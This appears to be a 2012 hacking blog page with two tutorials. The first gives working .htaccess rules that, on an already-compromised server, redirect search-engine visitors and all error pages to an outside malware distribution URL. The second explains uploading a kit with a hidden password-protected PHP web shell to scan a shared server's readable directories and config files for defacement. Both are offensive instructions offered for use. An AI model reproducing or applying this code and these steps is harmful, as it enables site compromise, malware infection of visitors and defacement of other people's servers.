Showing posts with label hackings ites. Show all posts
Showing posts with label hackings ites. Show all posts

Wednesday, 25 April 2012

Infecting Websites With Malware

Today i will show you all how to infect sites with malware in few steps ;) .

Things Required :
  • Shelled Server
  • Access to .htacess file 

Step By Step Tutorial :
  • open your shell & then find .htacess file .








  • Then now we will edit it, replace everything with the code given below .


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L]
RewriteEngine On
ErrorDocument 400 http://villusoftreit.ru/in.cgi?3
ErrorDocument 401 http://villusoftreit.ru/in.cgi?3
ErrorDocument 403 http://villusoftreit.ru/in.cgi?3
ErrorDocument 404 http://villusoftreit.ru/in.cgi?3
ErrorDocument 500 http://villusoftreit.ru/in.cgi?3

}


  • Now save the .htacess file . Viola! you have successfully infected the server with Malware .

Wednesday, 7 March 2012

Jumping Server Tutorial

Jumping Server - Its a method to  get access to all readable directories & possible databases on the particular server .

Requirements -


Step By Step Guide - 

  • Download & Upload you Jumping.zip file to your shell .
.







  • After uploading your jumping.zip file , now you have to extract it . so to extract it we will go to execute option & write the following command - " unzip Jumping.zip"  (without quotes ) .








  • Once we have unzipped our files in the public_html dir ,then we can access them by going to www.hackedsite.com/jumping  . 




























  • So after once you have opened it , now you have to open barc0de mini.php file . The barcode mini.php shell is a 404 Private shell . when you open it it will show like 404 not found , but actually there is a place to enter password . After you enter your password you will be prompted inside . So the password for this shell is Hackers .

























  • Now you after to open jump.php . It will scan for all readable directories on the server & after the scanning is done , you can see the readable directories there as shown in the image below .



























  • So once you have got the list of the readable directories , then you have to run the scan.php it will scan scan for config & other files in that directory . 






























  • So finally you got the list of all the readable directories & files . so accordingly you can deface the site by going to the particular directory & changing the index page .










Hope you all Liked the Tutorial & Special Thanks to the owner of Hackerzadda (AV) ; )
Any doubts just then just mention it Via Comments !
Comments would be appreciated :)